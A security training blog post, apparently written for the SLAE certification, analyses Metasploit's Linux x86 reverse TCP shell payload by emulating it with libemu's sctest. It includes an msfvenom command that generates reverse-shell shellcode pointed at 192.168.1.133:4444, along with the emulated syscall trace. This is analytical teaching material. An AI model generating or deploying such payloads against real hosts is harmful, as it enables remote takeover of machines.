This post covers the analysis of the linux/x86/shell_reverse_tcp Metasploit payload.
One of the previous assignments of the SLAE series consisted in writing a reverse tcp shell spawning shellcode, so everything should look familiar.
Let’s start by listing the payload options.
$ msfvenom -p linux/x86/shell_reverse_tcp --payload-options
Options for payload/linux/x86/shell_reverse_tcp
Name: Linux Command Shell, Reverse TCP Inline
Module: payload/linux/x86/shell_reverse_tcp
Platform: Linux
Arch: x86
Needs Admin: No
Total size: 190
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
—— ——————— ———— —————
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
I’ll use libemu instead of disassembling the shellcode with ndisasm. Libemu is a x86 emulation library that allows executing shellcode and profiling its behavior.
The sctest tool is part of the libemu test suite and can be used to run the shellcode. -S takes the input from STDIN. -s 10000 allows a large number of steps to run, so we make sure the shellcode completes its execution.
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.133 | sctest -vvv -S -s 10000
[…]
int socket (
int domain = 2;
int type = 1;
int protocol = 0;
) = 14;
int dup2 (
int oldfd = 14;
int newfd = 2;
) = 2;
int dup2 (
int oldfd = 14;
int newfd = 1;
) = 1;
int dup2 (
int oldfd = 14;
int newfd = 0;
) = 0;
int connect (
int sockfd = 14;
struct sockaddr_in * serv_addr = 0x00416fbe =>
struct = {
short sin_family = 2;
unsigned short sin_port = 23569 (port=4444);
struct in_addr sin_addr = {
unsigned long s_addr = -2063488832 (host=192.168.1.133);
};
char sin_zero = " ";
};
int addrlen = 102;
) = 0;
int execve (
const char * dateiname = 0x00416fa6 =>
= "/bin//sh";
const char * argv[] = [
= 0x00416f9e =>
= 0x00416fa6 =>
= "/bin//sh";
= 0x00000000 =>
none;
];
const char * envp[] = 0x00000000 =>
none;
) = 0;
The output contains the exact same system calls that were analyzed in the second assignment.
The first operation that takes place is the socket creation. After that comes the dup2 call on STDIN, STDOUT, and STDERR. The connect system call connects the socket to the configured address and port, which is 192.168.1.133:4444 in this case. Once the socket is connected, execve spawns a shell.
sctest also allows saving a dot formatted callgraph to visualize the shellcode execution. It’s as easy as adding the -G reverse_shell_callgraph.dot command line argument. The dot file can then be converted to png.
$ dot -T png reverse_shell_callgraph.dot -o reverse_shell_callgraph.png
The resulting image helps to detect the dup2 loop and the exact order of execution at first sight. It can be particularly helpful when trying to understand long, complex shellcode.
This approach is much faster than disassembling the shellcode and dissecting each part.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-651
oh-la-la 